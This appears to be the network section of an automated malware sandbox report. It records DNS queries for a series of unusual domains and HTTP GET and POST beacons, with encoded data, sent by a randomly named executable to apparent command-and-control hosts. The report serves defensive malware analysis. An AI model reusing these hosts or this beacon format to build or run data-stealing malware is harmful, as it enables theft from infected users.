                      Jul 2, 2024 07:15:37.693293095 CEST5862453192.168.2.51.1.1.1
                      Jul 2, 2024 07:15:37.710782051 CEST53586241.1.1.1192.168.2.5
                      Jul 2, 2024 07:15:51.011611938 CEST5190253192.168.2.51.1.1.1
                      Jul 2, 2024 07:15:51.046060085 CEST53519021.1.1.1192.168.2.5
                      Jul 2, 2024 07:16:04.475919008 CEST6163353192.168.2.51.1.1.1
                      Jul 2, 2024 07:16:04.484921932 CEST53616331.1.1.1192.168.2.5
                      Jul 2, 2024 07:16:12.537833929 CEST6493853192.168.2.51.1.1.1
                      Jul 2, 2024 07:16:12.793967009 CEST53649381.1.1.1192.168.2.5
                      Jul 2, 2024 07:16:29.490046024 CEST5450853192.168.2.51.1.1.1
                      Jul 2, 2024 07:16:29.500448942 CEST53545081.1.1.1192.168.2.5
                      Jul 2, 2024 07:16:37.555125952 CEST5016253192.168.2.51.1.1.1
                      Jul 2, 2024 07:16:38.006684065 CEST53501621.1.1.1192.168.2.5
                      Jul 2, 2024 07:16:51.477303028 CEST6269853192.168.2.51.1.1.1
                      Jul 2, 2024 07:16:51.558717966 CEST53626981.1.1.1192.168.2.5
                      Jul 2, 2024 07:17:04.865983009 CEST6047653192.168.2.51.1.1.1
                      Jul 2, 2024 07:17:05.550379992 CEST53604761.1.1.1192.168.2.5
                      Jul 2, 2024 07:17:39.606132030 CEST5410653192.168.2.51.1.1.1
                      Jul 2, 2024 07:17:39.632782936 CEST53541061.1.1.1192.168.2.5
                      Jul 2, 2024 07:17:53.101135015 CEST6429153192.168.2.51.1.1.1
                      Jul 2, 2024 07:17:53.128478050 CEST53642911.1.1.1192.168.2.5
                      Jul 2, 2024 07:18:06.460133076 CEST5093853192.168.2.51.1.1.1
                      Jul 2, 2024 07:18:06.481045961 CEST53509381.1.1.1192.168.2.5
                      Jul 2, 2024 07:18:19.773435116 CEST5231753192.168.2.51.1.1.1
                      Jul 2, 2024 07:18:19.888173103 CEST53523171.1.1.1192.168.2.5
                      Jul 2, 2024 07:18:33.491307020 CEST6167953192.168.2.51.1.1.1
                      Jul 2, 2024 07:18:33.512533903 CEST53616791.1.1.1192.168.2.5

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jul 2, 2024 07:15:21.920525074 CEST192.168.2.51.1.1.10xd39Standard query (0)www.hprlz.czA (IP address)IN (0x0001)false
                      Jul 2, 2024 07:15:37.693293095 CEST192.168.2.51.1.1.10x14d7Standard query (0)www.catherineviskadi.comA (IP address)IN (0x0001)false
                      Jul 2, 2024 07:15:51.011611938 CEST192.168.2.51.1.1.10x53a5Standard query (0)www.hatercoin.onlineA (IP address)IN (0x0001)false
                      Jul 2, 2024 07:16:04.475919008 CEST192.168.2.51.1.1.10x584Standard query (0)www.fourgrouw.cfdA (IP address)IN (0x0001)false
                      Jul 2, 2024 07:16:12.537833929 CEST192.168.2.51.1.1.10x97dcStandard query (0)www.bfiworkerscomp.comA (IP address)IN (0x0001)false
                      Jul 2, 2024 07:16:29.490046024 CEST192.168.2.51.1.1.10x5cb8Standard query (0)www.tinmapco.comA (IP address)IN (0x0001)false
                      Jul 2, 2024 07:16:37.555125952 CEST192.168.2.51.1.1.10xf79aStandard query (0)www.xn--fhq1c541j0zr.comA (IP address)IN (0x0001)false
                      Jul 2, 2024 07:16:51.477303028 CEST192.168.2.51.1.1.10x90f3Standard query (0)www.xn--matfrmn-jxa4m.seA (IP address)IN (0x0001)false
                      Jul 2, 2024 07:17:04.865983009 CEST192.168.2.51.1.1.10x6780Standard query (0)www.anuts.topA (IP address)IN (0x0001)false
                      Jul 2, 2024 07:17:39.606132030 CEST192.168.2.51.1.1.10xd3aStandard query (0)www.telwisey.infoA (IP address)IN (0x0001)false
                      Jul 2, 2024 07:17:53.101135015 CEST192.168.2.51.1.1.10x95f1Standard query (0)www.sandranoll.comA (IP address)IN (0x0001)false
                      Jul 2, 2024 07:18:06.460133076 CEST192.168.2.51.1.1.10xd0fStandard query (0)www.gipsytroya.comA (IP address)IN (0x0001)false
                      Jul 2, 2024 07:18:19.773435116 CEST192.168.2.51.1.1.10xaa09Standard query (0)www.helpers-lion.onlineA (IP address)IN (0x0001)false
                      Jul 2, 2024 07:18:33.491307020 CEST192.168.2.51.1.1.10xded2Standard query (0)www.dmtxwuatbz.ccA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jul 2, 2024 07:15:21.958450079 CEST1.1.1.1192.168.2.50xd39No error (0)www.hprlz.cz5.44.111.162A (IP address)IN (0x0001)false
                      Jul 2, 2024 07:15:37.710782051 CEST1.1.1.1192.168.2.50x14d7No error (0)www.catherineviskadi.com217.160.0.106A (IP address)IN (0x0001)false
                      Jul 2, 2024 07:15:51.046060085 CEST1.1.1.1192.168.2.50x53a5No error (0)www.hatercoin.onlineghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                      Jul 2, 2024 07:15:51.046060085 CEST1.1.1.1192.168.2.50x53a5No error (0)ghs.googlehosted.com142.250.181.243A (IP address)IN (0x0001)false
                      Jul 2, 2024 07:16:04.484921932 CEST1.1.1.1192.168.2.50x584Name error (3)www.fourgrouw.cfdnonenoneA (IP address)IN (0x0001)false
                      Jul 2, 2024 07:16:12.793967009 CEST1.1.1.1192.168.2.50x97dcNo error (0)www.bfiworkerscomp.com208.91.197.27A (IP address)IN (0x0001)false
                      Jul 2, 2024 07:16:29.500448942 CEST1.1.1.1192.168.2.50x5cb8Name error (3)www.tinmapco.comnonenoneA (IP address)IN (0x0001)false
                      Jul 2, 2024 07:16:38.006684065 CEST1.1.1.1192.168.2.50xf79aNo error (0)www.xn--fhq1c541j0zr.com43.252.167.188A (IP address)IN (0x0001)false
                      Jul 2, 2024 07:16:51.558717966 CEST1.1.1.1192.168.2.50x90f3No error (0)www.xn--matfrmn-jxa4m.se194.9.94.85A (IP address)IN (0x0001)false
                      Jul 2, 2024 07:16:51.558717966 CEST1.1.1.1192.168.2.50x90f3No error (0)www.xn--matfrmn-jxa4m.se194.9.94.86A (IP address)IN (0x0001)false
                      Jul 2, 2024 07:17:05.550379992 CEST1.1.1.1192.168.2.50x6780No error (0)www.anuts.top23.251.54.212A (IP address)IN (0x0001)false
                      Jul 2, 2024 07:17:39.632782936 CEST1.1.1.1192.168.2.50xd3aNo error (0)www.telwisey.info199.192.19.19A (IP address)IN (0x0001)false
                      Jul 2, 2024 07:17:53.128478050 CEST1.1.1.1192.168.2.50x95f1No error (0)www.sandranoll.com213.145.228.16A (IP address)IN (0x0001)false
                      Jul 2, 2024 07:18:06.481045961 CEST1.1.1.1192.168.2.50xd0fNo error (0)www.gipsytroya.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                      Jul 2, 2024 07:18:06.481045961 CEST1.1.1.1192.168.2.50xd0fNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                      Jul 2, 2024 07:18:19.888173103 CEST1.1.1.1192.168.2.50xaa09No error (0)www.helpers-lion.online194.58.112.174A (IP address)IN (0x0001)false
                      Jul 2, 2024 07:18:33.512533903 CEST1.1.1.1192.168.2.50xded2No error (0)www.dmtxwuatbz.cc172.67.210.102A (IP address)IN (0x0001)false
                      Jul 2, 2024 07:18:33.512533903 CEST1.1.1.1192.168.2.50xded2No error (0)www.dmtxwuatbz.cc104.21.45.56A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • www.hprlz.cz
                      • www.catherineviskadi.com
                      • www.hatercoin.online
                      • www.bfiworkerscomp.com
                      • www.xn--fhq1c541j0zr.com
                      • www.xn--matfrmn-jxa4m.se
                      • www.anuts.top
                      • www.telwisey.info
                      • www.sandranoll.com
                      • www.gipsytroya.com
                      • www.helpers-lion.online
                      • www.dmtxwuatbz.cc

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.5497115.44.111.162806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:15:21.971903086 CEST518OUTGET /w6qg/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1Ca0ipuJKNLUJAUyvRep5v3DJLNu0m2HizCt4wFiNb5RCLtMg== HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.hprlz.cz
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:15:22.647814035 CEST769INHTTP/1.1 301 Moved Permanently
                      Server: nginx
                      Date: Tue, 02 Jul 2024 05:15:22 GMT
                      Content-Type: text/html; charset=iso-8859-1
                      Content-Length: 399
                      Connection: close
                      Location: https://www.hprlz.cz/w6qg/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1Ca0ipuJKNLUJAUyvRep5v3DJLNu0m2HizCt4wFiNb5RCLtMg==
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 70 72 6c 7a 2e 63 7a 2f 77 36 71 67 2f 3f 4a 6a 76 3d 47 70 4b 68 52 56 53 48 7a 4c 41 38 6a 34 52 26 61 6d 70 3b 36 36 73 30 51 48 78 3d 30 6c 70 54 52 51 63 44 55 48 2b 69 45 73 47 7a 46 72 4b 44 6c 45 6b 78 66 30 68 53 47 62 71 65 37 5a 2f 78 75 4e 6d 54 67 64 6c 69 39 72 70 4f 55 47 79 58 69 7a 6a 35 63 51 39 58 78 43 34 73 6f 38 34 46 4e 70 46 52 39 74 78 58 78 6d 30 74 71 31 43 61 30 69 70 75 4a 4b 4e 4c 55 4a 41 55 79 76 52 65 70 35 [TRUNCATED]
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.hprlz.cz/w6qg/?Jjv=GpKhRVSHzLA8j4R&amp;66s0QHx=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1Ca0ipuJKNLUJAUyvRep5v3DJLNu0m2HizCt4wFiNb5RCLtMg==">here</a>.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.549712217.160.0.106806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:15:37.719521046 CEST799OUTPOST /qe66/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.catherineviskadi.com
                      Origin: http://www.catherineviskadi.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.catherineviskadi.com/qe66/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 51 6c 48 72 66 70 53 50 44 67 78 66 5a 61 63 2b 51 6c 4e 41 73 53 42 46 62 6e 77 79 33 61 2b 72 64 6c 56 6d 4d 4e 6b 2b 49 4c 37 5a 59 72 47 4d 46 70 61 4c 66 35 6f 76 69 35 4c 39 78 6f 56 57 4f 43 42 46 78 67 58 30 61 6d 6f 4f 34 53 4c 4e 42 54 7a 6f 6f 67 61 42 6a 62 71 48 52 2b 64 78 37 67 4a 62 61 31 71 68 6a 75 57 6d 54 6f 68 6f 6b 54 4f 4e 33 6a 7a 34 4d 74 44 52 37 4b 31 73 77 67 44 6b 79 37 66 4c 71 67 65 56 52 48 69 38 6a 47 37 78 31 79 48 35 32 6f 75 51 55 4c 6e 52 37 33 49 6b 48 66 4f 7a 51 52 51 57 48 76 72 44 52 74 54 78 59 79 54 31 65 2b 46 33 51 55 69 71 5a 6f 4c 61 2b 6e 38 3d
                      Data Ascii: 66s0QHx=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR73IkHfOzQRQWHvrDRtTxYyT1e+F3QUiqZoLa+n8=
                      Jul 2, 2024 07:15:38.378916979 CEST580INHTTP/1.1 404 Not Found
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Date: Tue, 02 Jul 2024 05:15:38 GMT
                      Server: Apache
                      Content-Encoding: gzip
                      Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                      Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.549713217.160.0.106806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:15:40.247292995 CEST819OUTPOST /qe66/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.catherineviskadi.com
                      Origin: http://www.catherineviskadi.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.catherineviskadi.com/qe66/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 66 5a 59 4c 32 4d 45 6f 61 4c 63 35 6f 76 70 5a 4c 38 31 6f 56 6e 4f 43 4e 72 78 69 44 30 61 6d 73 4f 34 54 37 4e 42 45 6e 72 72 51 61 44 6f 37 71 46 4d 75 64 78 37 67 4a 62 61 31 75 50 6a 76 2b 6d 51 59 52 6f 6c 79 4f 43 72 54 7a 2f 45 4e 44 52 32 71 31 6f 77 67 44 4b 79 2b 47 75 71 6d 43 56 52 48 53 38 67 54 58 79 38 79 48 37 35 49 76 45 46 71 4b 42 69 46 30 6c 4b 50 44 5a 41 54 45 7a 4c 35 47 70 4c 50 62 5a 4c 53 2f 4e 4f 74 4e 41 42 6b 44 44 44 4c 62 71 67 77 71 72 34 36 6e 32 45 50 63 5a 6e 56 66 73 79 71 73 4b 72 72 72 78
                      Data Ascii: 66s0QHx=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4fZYL2MEoaLc5ovpZL81oVnOCNrxiD0amsO4T7NBEnrrQaDo7qFMudx7gJba1uPjv+mQYRolyOCrTz/ENDR2q1owgDKy+GuqmCVRHS8gTXy8yH75IvEFqKBiF0lKPDZATEzL5GpLPbZLS/NOtNABkDDDLbqgwqr46n2EPcZnVfsyqsKrrrx
                      Jul 2, 2024 07:15:40.896181107 CEST580INHTTP/1.1 404 Not Found
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Date: Tue, 02 Jul 2024 05:15:40 GMT
                      Server: Apache
                      Content-Encoding: gzip
                      Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                      Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.549714217.160.0.106806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:15:42.777931929 CEST1836OUTPOST /qe66/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.catherineviskadi.com
                      Origin: http://www.catherineviskadi.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.catherineviskadi.com/qe66/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 58 5a 59 36 57 4d 45 4c 43 4c 64 35 6f 76 6b 35 4c 68 31 6f 56 41 4f 43 46 76 78 69 50 6b 61 67 77 4f 35 78 7a 4e 52 67 4c 72 38 41 61 44 6e 62 71 49 52 2b 63 7a 37 67 5a 66 61 31 2b 50 6a 76 2b 6d 51 61 4a 6f 6c 6a 4f 43 70 54 7a 34 4d 74 44 4e 37 4b 31 41 77 67 37 38 79 36 62 62 72 51 79 56 53 6e 43 38 77 78 50 79 2b 53 48 44 34 49 76 4d 46 71 48 62 69 42 55 54 4b 50 32 32 41 52 55 7a 50 74 76 41 59 65 6e 65 52 52 6d 31 4d 2f 63 69 57 69 58 68 42 4b 54 4f 6f 6a 47 71 31 4f 76 43 54 50 67 4e 69 30 57 38 74 73 63 4e 69 50 53 38 2f 70 35 34 55 44 59 78 4a 4a 50 6b 4e 75 4e 4a 2b 30 43 43 4b 53 2f 32 63 45 76 57 57 4f 51 2b 32 42 7a 31 48 44 43 50 52 45 76 71 2f 37 2f 78 65 73 67 6d 62 75 31 35 30 6f 5a 35 46 4e 63 41 52 70 4b 52 7a 72 44 52 63 79 52 4e 6c 34 73 59 41 70 6d 4e 69 4a 61 73 57 4e 36 73 36 30 69 4e 36 75 30 31 64 72 36 72 54 55 6d 44 41 58 [TRUNCATED]
                      Data Ascii: 66s0QHx=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4XZY6WMELCLd5ovk5Lh1oVAOCFvxiPkagwO5xzNRgLr8AaDnbqIR+cz7gZfa1+Pjv+mQaJoljOCpTz4MtDN7K1Awg78y6bbrQyVSnC8wxPy+SHD4IvMFqHbiBUTKP22ARUzPtvAYeneRRm1M/ciWiXhBKTOojGq1OvCTPgNi0W8tscNiPS8/p54UDYxJJPkNuNJ+0CCKS/2cEvWWOQ+2Bz1HDCPREvq/7/xesgmbu150oZ5FNcARpKRzrDRcyRNl4sYApmNiJasWN6s60iN6u01dr6rTUmDAX5sxPp3UuTC6FcQXzF/5wsvGZostbh71MAweh6LQmJIrN32y/CO5D3fSwX6mKu7KoomL8pbXhgFkS/U8wicrh6g47fDJgZHMqaBAlzJ7XnQhcsyKtZlgLi9EsjDuzWYZi4dOGmfcEgRAcjMHDmHxGTLexBSfMh1EqNunBhL9Q4fOQq4CLePnSKtJLFPJ47jT1ifPGQ8YSycNrg/LLkuV40k72gJheWwicWuN9VNJX5hWHJaLaKVhHj4lfiAQH0r66g1+I6mcq/b29jOLz1z/h6i6MtVd78LEQp88oZlnGEzkaXbCHYpx20klx/P7tqyxVFsmHMckA+jddGob/pum4mgLLpuDssrAQWNCHT+Up3UwijhaKWYKE2Tg8PK7/XtPFb4u81dd3kiinAPNKo334ZXrMkDyiQiu0UcbPoYDhr0zZ1t/hq9uzjE0DApYpLxsY31+la2QLXUN3mVJtfpC5yEGlKZ3XFmFEhvfH96HlZ4k3fOaR71WS7Jv8/Z3Xu8X5Zor/U1pw3A4VoohKE1NKhn8R7F/OCTZ2bPziPKrNuaO2OcaS0ZdJyzTLL2A2TkUP3e7jYIiLQs0EFyNi+Ixa4qLObZZ7NErzC9gy7aFnNUA6RWxCpR/QOyxGUmhZnDdnPxMH8hOMewAGdGdYf+L4smRXeE6IImWOqw [TRUNCATED]
                      Jul 2, 2024 07:15:43.489996910 CEST580INHTTP/1.1 404 Not Found
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Date: Tue, 02 Jul 2024 05:15:43 GMT
                      Server: Apache
                      Content-Encoding: gzip
                      Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                      Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.549715217.160.0.106806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:15:45.309660912 CEST530OUTGET /qe66/?66s0QHx=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv5wKSlbq5H9RfpzlUfmq/1+2mTftJij2S2gWTPvHx6aM7mw==&Jjv=GpKhRVSHzLA8j4R HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.catherineviskadi.com
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:15:45.979480028 CEST770INHTTP/1.1 404 Not Found
                      Content-Type: text/html
                      Content-Length: 626
                      Connection: close
                      Date: Tue, 02 Jul 2024 05:15:45 GMT
                      Server: Apache
